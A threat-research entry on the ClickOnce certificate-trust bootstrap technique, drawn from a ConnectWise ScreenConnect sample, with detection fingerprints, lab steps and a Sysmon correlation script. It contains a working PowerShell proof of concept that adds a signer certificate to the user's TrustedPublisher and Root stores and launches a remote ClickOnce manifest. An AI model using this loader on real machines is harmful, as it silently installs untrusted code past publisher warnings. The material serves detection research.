type: technique | confidence: high | created: 2026-06-07 | updated: 2026-06-07 | tags: defense-evasion, signing, c2, mitre-attck, research-target

ClickOnce certificate-trust bootstrap

A Windows PE parses its own embedded Authenticode signature, installs the signer certificate into the current user's TrustedPublisher store, and then calls dfshim.dll!ShOpenVerbApplicationW to silently launch a remote ClickOnce .application manifest.

What the technique does

ClickOnce is Microsoft's application-deployment technology: an application is published to a web server (or file share) and installed or launched from a URL ending in .application. Before installing, the ClickOnce trust manager prompts the user when the manifest's signer is not in the TrustedPublisher store ("Unknown Publisher"). This technique pre-empts that prompt: the bootstrapper extracts the signer certificate from its own Authenticode signature, adds it to the TrustedPublisher store, and immediately invokes dfshim to fetch and run the payload. Because CertOpenSystemStore opens the current-user store, no elevation is needed. The result: no trust prompt, no SmartScreen interruption (the manifest is fetched by dfshim/dfsvc rather than downloaded through the browser), and a deployment chain in which every artifact carries a valid signature.

Detection / fingerprint

  • Imports CRYPT32.dll and calls CertOpenSystemStoreA with the string "TrustedPublisher" (or "ROOT")
  • Calls CryptQueryObject on the running module file (obtained via GetModuleFileNameW)
  • Calls CertAddCertificateContextToStore or CertAddEncodedCertificateToStore
  • Loads dfshim.dll and resolves ShOpenVerbApplicationW
  • Command-line or URL contains .application?h= or ScreenConnect.Client.application
  • No direct WinINet/WinHTTP/CURL imports; the manifest and payload are fetched by dfsvc.exe (the ClickOnce service that dfshim.dll spawns), so the bootstrapper itself generates no HTTP traffic

Implementation patterns observed

Sample: connectwise 81adbf9a — MSVC C++ PE32, 305 KB, valid Authenticode by ConnectWise, LLC.

  1. Self-path resolution: GetModuleFileNameW(NULL, buf, MAX_PATH) ^[raw/analyses/81adbf9a/report.md]
  2. Store open: CertOpenSystemStoreA(0, "TrustedPublisher") ^[raw/analyses/81adbf9a/report.md]
  3. Signature parse: CryptQueryObject(CERT_QUERY_OBJECT_FILE, selfPath, ...) to obtain HCRYPTMSG ^[raw/analyses/81adbf9a/report.md]
  4. Cert iteration: Loop over signers, call CryptMsgGetParam(hMsg, CMSG_CERT_PARAM, index, ...) to get encoded cert blob ^[raw/analyses/81adbf9a/report.md]
  5. Trust injection: CertCreateCertificateContext(X509_ASN_ENCODING, blob, len) → CertAddCertificateContextToStore(hStore, pContext, CERT_STORE_ADD_ALWAYS, NULL) ^[raw/analyses/81adbf9a/report.md]
  6. ClickOnce launch: LoadLibraryA("dfshim") → GetProcAddress("ShOpenVerbApplicationW") → invoke with URL to remote .application manifest ^[raw/analyses/81adbf9a/report.md]

Reproduce on your own VMs

Goal: Build a minimal PoC that adds a self-signed cert to TrustedPublisher and launches a remote ClickOnce app.

Prerequisites:

  • Windows 10/11 research VM with Visual Studio Community
  • A self-signed code-signing certificate (see New-SelfSignedCertificate -Type CodeSigningCert in PowerShell)
  • A trivial ClickOnce .application manifest published to \\VM-IP\share\ or a local web server

Steps:

  1. Create a new C++ Win32 project in VS 2022.
  2. Add #include <wincrypt.h> and link crypt32.lib.
  3. Implement the six-step flow above.
  4. Sign the resulting EXE with your self-signed cert (signtool sign /f mycert.pfx /p password /fd SHA256 app.exe).
  5. Publish a trivial ClickOnce app (e.g., a WinForms "Hello World") to a local IIS folder.
  6. Run the signed bootstrapper. On the VM, open certmgr.msc → Trusted Publishers — your self-signed cert should appear.
  7. The ClickOnce app should install without an "Unknown Publisher" warning. Caveat: TrustedPublisher membership only suppresses the prompt when the signer's chain also validates; a self-signed lab cert must therefore also be imported into Trusted Root Certification Authorities, whereas the ConnectWise sample's CA-issued cert already chains to a trusted root.

What you'll learn: how to detect this at the API-telemetry layer. Focus on the CryptQueryObject → CertAddCertificateContextToStore → LoadLibrary("dfshim.dll") chain inside a single process, rather than on network indicators, which look identical to a legitimate ClickOnce install.
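The six-step flow and the lab reproduction above, written out as an added PowerShell example (this is not the sample's code and not ConnectWise's): each managed call is commented with the crypt32 call it stands in for. Assumed inputs are $SignedExe (the EXE you signed in step 4) and $ManifestUrl (the manifest you published in step 5); the -AlsoTrustRoot switch exists only because a self-signed lab certificate has no trusted chain. Unlike the sample, it hands the URL to rundll32 rather than loading dfshim.dll into its own process, which is the difference a Sysmon ImageLoad rule keys on.

```powershell
# Added lab example, not code from the analysed sample. Run only inside the research VM.
[CmdletBinding()]
param(
    [Parameter(Mandatory)][string]$SignedExe,    # stand-in for GetModuleFileNameW(NULL, ...) (step 1)
    [Parameter(Mandatory)][string]$ManifestUrl,  # e.g. http://lab-iis/clickonce/HelloWorld.application (assumed path)
    [switch]$AlsoTrustRoot                       # self-signed lab certs also need to be a trusted root
)
$ErrorActionPreference = 'Stop'

# Steps 3+4: pull the signer certificate out of the PE's own Authenticode blob.
# Get-AuthenticodeSignature wraps WinVerifyTrust; the native sample instead walks
# CryptQueryObject -> CryptMsgGetParam(CMSG_CERT_PARAM) and never checks the chain,
# so this script deliberately does not require Status -eq 'Valid' either.
$sig = Get-AuthenticodeSignature -FilePath $SignedExe
if (-not $sig.SignerCertificate) { throw "$SignedExe carries no Authenticode signature" }
$cert = $sig.SignerCertificate
Write-Host ("Signer: {0}  thumbprint {1}  status {2}" -f $cert.Subject, $cert.Thumbprint, $sig.Status)

function Add-CertToUserStore {
    # Steps 2+5: CertOpenSystemStoreA(0, "<store>") opens the *current-user* store, which
    # needs no elevation; ClickOnce consults CurrentUser\TrustedPublisher when deciding
    # whether to show the "Unknown Publisher" prompt.
    param(
        [System.Security.Cryptography.X509Certificates.X509Certificate2]$Certificate,
        [string]$StoreName
    )
    $store = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store `
                        -ArgumentList $StoreName, 'CurrentUser'
    $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
    try     { $store.Add($Certificate) }   # equivalent of CertAddCertificateContextToStore
    finally { $store.Close() }

    # Repro step 6: confirm the thumbprint now appears under the user store (same view as certmgr.msc).
    $present = Get-ChildItem "Cert:\CurrentUser\$StoreName" |
               Where-Object { $_.Thumbprint -eq $Certificate.Thumbprint }
    if (-not $present) { throw "Certificate did not land in CurrentUser\$StoreName" }
    Write-Host "Installed $($Certificate.Thumbprint) into CurrentUser\$StoreName"
}

Add-CertToUserStore -Certificate $cert -StoreName 'TrustedPublisher'
if ($AlsoTrustRoot) {
    # A self-signed publisher cert still fails chain building, so ClickOnce keeps prompting
    # unless the same cert is also a trusted root. Note the user-experience difference:
    # writes to CurrentUser\Root pop a Windows confirmation dialog, TrustedPublisher does not.
    Add-CertToUserStore -Certificate $cert -StoreName 'Root'
}

# Step 6: hand the manifest URL to dfshim.dll!ShOpenVerbApplicationW. rundll32 appends the
# "W" suffix itself and is the documented entry point a browser protocol handler uses; the
# sample LoadLibrary()s dfshim into its own image instead, which is what makes its
# Sysmon ImageLoad record stand out.
Start-Process -FilePath "$env:SystemRoot\System32\rundll32.exe" `
              -ArgumentList "dfshim.dll,ShOpenVerbApplication $ManifestUrl"
```

Running it a second time is harmless (X509Store.Add is a no-op for a certificate already present), which mirrors the sample's CERT_STORE_ADD_ALWAYS choice. To reset the VM between runs, delete the thumbprint from Cert:\CurrentUser\TrustedPublisher (and Cert:\CurrentUser\Root if you used -AlsoTrustRoot).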

Defensive countermeasures

  • EDR / API telemetry: Alert on CertAddCertificateContextToStore (or CertAddEncodedCertificateToStore) targeting TrustedPublisher or ROOT from a process that is not a known installer or certificate-management tool. User stores are registry-backed (HKCU\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\<thumbprint>), so where API hooking is unavailable the same write shows up as a Sysmon RegistryEvent (Event ID 12/13).
  • Sysmon Event ID 7 (ImageLoad): Detect dfshim.dll loaded by non-standard callers (e.g., a random .exe in %TEMP%) rather than by rundll32.exe, dfsvc.exe or a browser.
  • Application Control (AppLocker / WDAC): Block execution of unsigned or non-allowlisted binaries from user-writable paths so the bootstrapper never runs; DLL rules can also restrict who may load dfshim.dll, but blocking it outright breaks every legitimate ClickOnce deployment.
  • Network: Monitor outbound HTTP(S) requests for .application manifests from dfsvc.exe (the ClickOnce service) to hosts outside the organisation's known deployment servers.
  • Certificate pinning: If your org uses ConnectWise ScreenConnect legitimately, record the expected signer thumbprint of its manifests and alert on any other publisher being added to TrustedPublisher or appearing in a ScreenConnect.Client.application launch.
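The fingerprint list and the countermeasures above, turned into a correlation rule as an added example (not part of the analysis report): it joins the three Sysmon artifacts the technique leaves in one process. Field names follow Sysmon's EventData schema; the allow-list regexes, the 120-second window, the sample events and the GUIDs/paths in them are constructed for this illustration and must be tuned per environment.

```powershell
# Added detection example, not from the analysis report. Sysmon must be configured to record
# ImageLoad for dfshim.dll and RegistryEvent for the SystemCertificates keys (see note below).

# Assumed allow-lists: who may legitimately load dfshim.dll / write to a user cert store.
$AllowedDfshimLoaders = '^C:\\Windows\\(System32|SysWOW64)\\rundll32\.exe$|' +
                        '^C:\\Windows\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\dfsvc\.exe$|' +
                        '\\(iexplore|msedge|chrome|firefox)\.exe$'
$AllowedStoreWriters  = '^C:\\Windows\\(System32|SysWOW64)\\(certutil|mmc|svchost|lsass)\.exe$'
# User stores are registry-backed, so CertAddCertificateContextToStore on a user store
# surfaces as Sysmon 12/13 under HKU\<SID>\SOFTWARE\Microsoft\SystemCertificates\<store>\Certificates\<thumbprint>.
$StoreKeyPattern      = '\\SystemCertificates\\(TrustedPublisher|Root)\\Certificates\\'

function ConvertFrom-SysmonEvent {
    # Flatten a Get-WinEvent record from Microsoft-Windows-Sysmon/Operational into the
    # shape Find-ClickOnceTrustBootstrap expects.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    $x = [xml]$Record.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Id = $Record.Id; Time = $Record.TimeCreated; ProcessGuid = $d['ProcessGuid']
        Image = $d['Image']; CommandLine = $d['CommandLine']
        ImageLoaded = $d['ImageLoaded']; TargetObject = $d['TargetObject']
    }
}

function Find-ClickOnceTrustBootstrap {
    param([object[]]$Events, [int]$WindowSeconds = 120)
    $findings = @()
    foreach ($grp in ($Events | Group-Object ProcessGuid)) {
        $evs   = $grp.Group | Sort-Object Time
        $image = ($evs | Select-Object -First 1).Image
        $storeWrites = @($evs | Where-Object { $_.Id -in @(12, 13) -and $_.TargetObject -match $StoreKeyPattern })
        $dfshimLoads = @($evs | Where-Object { $_.Id -eq 7 -and $_.ImageLoaded -match '\\dfshim\.dll$' })
        $manifestCmd = @($evs | Where-Object { $_.Id -eq 1 -and
                          $_.CommandLine -match '\.application\?h=|ScreenConnect\.Client\.application' })
        # High confidence: the same process wrote a trusted-publisher/root cert and then loaded dfshim.
        if ($storeWrites -and $dfshimLoads) {
            $gap = ($dfshimLoads[0].Time - $storeWrites[0].Time).TotalSeconds
            if ($gap -ge 0 -and $gap -le $WindowSeconds) {
                $findings += [pscustomobject]@{ Severity = 'high'; Image = $image; ProcessGuid = $grp.Name
                    Reason = "cert-store write $($storeWrites[0].TargetObject) then dfshim.dll load $([int]$gap)s later" }
                continue
            }
        }
        # Medium: either half of the chain from an unexpected image.
        if ($dfshimLoads -and $image -notmatch $AllowedDfshimLoaders) {
            $findings += [pscustomobject]@{ Severity = 'medium'; Image = $image; ProcessGuid = $grp.Name
                Reason = 'dfshim.dll loaded by a non-standard caller' }
        }
        if ($storeWrites -and $image -notmatch $AllowedStoreWriters) {
            $findings += [pscustomobject]@{ Severity = 'medium'; Image = $image; ProcessGuid = $grp.Name
                Reason = "user cert store written: $($storeWrites[0].TargetObject)" }
        }
        # Low: ClickOnce manifest URL on a command line (legitimate ScreenConnect installs trip this too).
        if ($manifestCmd) {
            $findings += [pscustomobject]@{ Severity = 'low'; Image = $image; ProcessGuid = $grp.Name
                Reason = "ClickOnce manifest on command line: $($manifestCmd[0].CommandLine)" }
        }
    }
    return $findings
}

# Constructed sample telemetry (GUIDs, paths, SID and thumbprint are made up for this example).
$t0 = Get-Date '2026-06-07T10:00:00Z'
$tmpExe = 'C:\Users\lab\AppData\Local\Temp\setup.exe'
$SampleEvents = @(
    [pscustomobject]@{ Id = 1;  Time = $t0;               ProcessGuid = '{A}'; Image = $tmpExe; CommandLine = "`"$tmpExe`""; ImageLoaded = $null; TargetObject = $null }
    [pscustomobject]@{ Id = 13; Time = $t0.AddSeconds(2); ProcessGuid = '{A}'; Image = $tmpExe; CommandLine = $null; ImageLoaded = $null
                       TargetObject = 'HKU\S-1-5-21-1-2-3-1001\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\0123456789ABCDEF0123456789ABCDEF01234567\Blob' }
    [pscustomobject]@{ Id = 7;  Time = $t0.AddSeconds(3); ProcessGuid = '{A}'; Image = $tmpExe; CommandLine = $null; ImageLoaded = 'C:\Windows\System32\dfshim.dll'; TargetObject = $null }
    # Benign: a browser handing a manifest to rundll32, the expected dfshim loader -> no finding.
    [pscustomobject]@{ Id = 7;  Time = $t0.AddSeconds(60); ProcessGuid = '{B}'; Image = 'C:\Windows\System32\rundll32.exe'; CommandLine = $null; ImageLoaded = 'C:\Windows\System32\dfshim.dll'; TargetObject = $null }
    # Suspicious but incomplete: %TEMP% binary loads dfshim without touching a cert store -> medium.
    [pscustomobject]@{ Id = 7;  Time = $t0.AddSeconds(90); ProcessGuid = '{C}'; Image = 'C:\Users\lab\AppData\Local\Temp\updater.exe'; CommandLine = $null; ImageLoaded = 'C:\Windows\SysWOW64\dfshim.dll'; TargetObject = $null }
)
Find-ClickOnceTrustBootstrap -Events $SampleEvents | Format-Table Severity, Image, Reason -AutoSize
```

On a live host replace $SampleEvents with `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1,7,12,13} | ForEach-Object { ConvertFrom-SysmonEvent $_ }`. Sysmon does not log image loads or registry writes unless its configuration asks for them, so add an `<ImageLoad onmatch="include">` rule with `<ImageLoaded condition="end with">dfshim.dll</ImageLoaded>` and a `<RegistryEvent onmatch="include">` rule with `<TargetObject condition="contains">SystemCertificates\TrustedPublisher\Certificates</TargetObject>` (and the same for Root) before expecting the high-confidence correlation to fire.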

Cross-references